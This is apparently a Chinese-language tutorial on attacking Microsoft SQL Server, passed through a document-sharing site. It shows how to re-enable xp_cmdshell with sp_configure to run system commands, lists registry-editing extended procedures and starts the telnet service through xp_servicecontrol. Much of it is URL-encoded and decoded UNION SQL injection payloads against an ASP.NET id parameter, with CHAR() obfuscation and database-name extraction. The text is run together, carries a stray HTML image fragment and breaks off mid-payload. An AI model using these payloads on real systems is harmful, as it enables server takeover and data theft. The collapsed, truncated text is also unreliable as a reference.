信息对抗技术文档.docxVIP

存储过程为数据库提供了强大的功能，其类似UDF，在MSSQL中xp_cmdshell可谓臭名昭著了。MSSQL强大的存储过程也为黑客提供了遍历，在相应的权限下，攻击者可以利用不同的存储过程执行不同的高级功能，如增加MSSQL数据库用户，枚举文件目录等等。而这些系统存储过程中要数xp_cmdshell最强大，通过该存储过程可以在数据库服务器中执行任意系统命令。MSSQL2005,2008等之后版本的MSSQL都分别对系统存储过程做了权限控制以防止被滥用。EXEC master.dbo.xp_cmdshell ipconfigxp_cmdshell默认在mssql2000中是开启的，在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。EXEC sp_configure show advanced options,1//允许修改高级参数 RECONFIGURE EXEC sp_configure xp_cmdshell,1 //打开xp_cmdshell扩展 RECONFIGURE开启后执行语句img src=/images14203563357663.png!small title=QQ截图20150104141448.png//p除了xp_cmdshell还有操作注册表的xp_regaddmultistringxp_regdeletekey //删除键xp_regdeletevalue //删除值xp_regenumkeysxp_regenumvalues //返回多个值xp_regread //读取键值xp_regremovemultistringxp_regwrite //写入键值 控制服务的xp_servicecontrol等开启telnet服务execmaster..xp_servicecontrol start, tlntsvr测试/2.aspx id=999999.9+union+all+select+%28select+cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bChar%28110%29%2bChar%28106%29%2bChar%28101%29%2bChar%2899%29%2bChar%28116%29%2bChar%28105%29%2bChar%28111%29%2bChar%28110%29+as+nvarchar%284000%29%29%29%2Cnull%2Cnull--url解码删除空格+，转换Asc，比较简单的语句就不注释了id=999999.9+union+all+select+(select+cast(Char(114)+Char(51)+Char(100)+Char(109)+Char(48)+Char(118)+Char(51)+Char(95)+Char(104)+Char(118)+Char(106)+Char(95)+Char(105)+Char(110)+Char(106)+Char(101)+Char(99)+Char(116)+Char(105)+Char(111)+Char(110)+as+nvarchar(4000))),null,null--cast字符类型转换CAST ( expression AS data_type [ ( length ) ] )id=999999.9 union all select (select cast(r3dm0v3_hvi_iniectionas nvarchar(4000))),null,null—//相当于 select r3dm0v3_hvi_iniection,null,null-- /2.aspx id=999999.9+union+all+select+null,char(126)+char(39)+cast(db_name()+COLLATE+SQL_Latin1_General_Cp1254_CS_AS+as+nvarchar(4000))+char(39)+char(126),null--获取当前数据库名字/2.aspxid=999999.9+union+all+select+null,~cast(db_name()COLLATE SQL_Latin1_Gen